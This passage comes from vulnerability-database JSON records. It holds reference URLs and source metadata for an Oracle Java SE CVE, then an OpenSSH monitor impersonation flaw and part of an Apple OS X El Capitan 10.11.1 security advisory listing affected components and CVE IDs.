"http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3551" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://www.oracle.com/technetwork/java/javase/releasenotes-136954.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5817.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5797.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5782.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5802.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5803.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5832.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5778.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5823.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5783.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5801.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5780.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5818.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5824.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5789.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5850.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5812.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5842.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5902.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5849.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5831.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5776.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5848.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5852.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5840.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3829.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5772.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5905.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5819.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5820.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5809.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5825.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5774.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5830.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5784.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-4002.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5906.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5790.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5787.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5804.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5843.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5814.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5829.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1540.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1476.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3342" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0428.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1480.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2419.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4823" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0425.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5089.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1722.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5079.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0419.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1721.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5081.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5071.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1532.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3216.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5069.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3143" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5084.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0443.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0809.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1487.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0351.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4820.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1569.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0433.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1493.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5073.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4823.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2435.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5068.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4822" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1541.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5068" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4822.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3159.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1557.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5075.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2429.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3213" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5069" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0551" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1713.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3213.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0441.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5072.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1718.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0432.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0446.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4820" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1481.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1537.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1717.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1531.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2432.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0450.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1491.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2383.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1473.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0547.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1563.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2433.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1716.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5083.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1533.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3342.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0426.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3143.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0440.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1725.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0445.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2394.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1682.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5071" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2430.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5072" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0442.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0551.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1719.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1486.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2384.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3159" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0438.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5073" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1478.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0435.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0434.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2420.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2440.html" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2433" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" } ], "sources": [ { "db": "BID", "id": "60625" }, { "db": "PACKETSTORM", "id": "122551" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122405" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122404" }, { "db": "CNNVD", "id": "CNNVD-201306-307" }, { "db": "NVD", "id": "CVE-2013-2451" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "60625" }, { "db": "PACKETSTORM", "id": "122551" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122405" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122404" }, { "db": "CNNVD", "id": "CNNVD-201306-307" }, { "db": "NVD", "id": "CVE-2013-2451" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-18T00:00:00", "db": "BID", "id": "60625" }, { "date": "2013-07-25T21:29:30", "db": "PACKETSTORM", "id": "122551" }, { "date": "2014-06-30T23:39:28", "db": "PACKETSTORM", "id": "127267" }, { "date": "2013-07-15T14:57:00", "db": "PACKETSTORM", "id": "122405" }, { "date": "2013-06-18T18:33:33", "db": "PACKETSTORM", "id": "122075" }, { "date": "2014-04-17T22:01:36", "db": "PACKETSTORM", "id": "126195" }, { "date": "2013-10-23T22:58:21", "db": "PACKETSTORM", "id": "123735" }, { "date": "2013-06-21T01:38:12", "db": "PACKETSTORM", "id": "122109" }, { "date": "2013-08-02T15:12:49", "db": "PACKETSTORM", "id": "122653" }, { "date": "2013-07-15T14:54:00", "db": "PACKETSTORM", "id": "122404" }, { "date": "2013-06-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201306-307" }, { "date": "2013-06-18T22:55:02.507000", "db": "NVD", "id": "CVE-2013-2451" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-14T20:12:00", "db": "BID", "id": "60625" }, { "date": "2022-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201306-307" }, { "date": "2022-05-13T14:52:54.533000", "db": "NVD", "id": "CVE-2013-2451" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "60625" }, { "db": "CNNVD", "id": "CNNVD-201306-307" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE JRE Unknown security vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-307" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "60625" } ], "trust": 0.3 } }
var-201508-0112
Vulnerability from variot
The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. OpenSSH (OpenBSD Secure Shell) is a set of connection tools maintained by the OpenBSD project group for secure access to remote computers. This tool is an open source implementation of the SSH protocol, which supports encryption of all transmissions and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. A remote code execution vulnerability exists in OpenSSH. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may cause a denial of service. Failed exploit attempts may result in denial-of-service conditions. There is a security vulnerability in the monitor component in the sshd of OpenSSH 6.9 and earlier versions based on non-OpenBSD platforms. The vulnerability is caused by the program incorrectly receiving the external username data in the MONITOR_REQ_PAM_INIT_CTX request. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007
OS X El Capitan 10.11.1 and Security Update 2015-007 are now available and address the following:
Accelerate Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in the Accelerate Framework in multi-threading mode. This issue was addressed through improved accessor element validation and improved object locking. CVE-ID CVE-2015-5940 : Apple
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.29 and 5.4.45. These were addressed by updating PHP to versions 5.5.29 and 5.4.45. CVE-ID CVE-2015-0235 CVE-2015-0273 CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 CVE-2015-6838
ATS Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted webpage may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in ATS. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team
Audio Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code Description: An uninitialized memory issue existed in coreaudiod. This issue was addressed through improved memory initialization. CVE-ID CVE-2015-7003 : Mark Brand of Google Project Zero
Audio Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Playing a malicious audio file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of audio files. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5933 : Apple CVE-2015-5934 : Apple
Bom Available for: OS X El Capitan 10.11 Impact: Unpacking a maliciously crafted archive may lead to arbitrary code execution Description: A file traversal vulnerability existed in the handling of CPIO archives. This issue was addressed through improved validation of metadata. CVE-ID CVE-2015-7006 : Mark Dowd of Azimuth Security
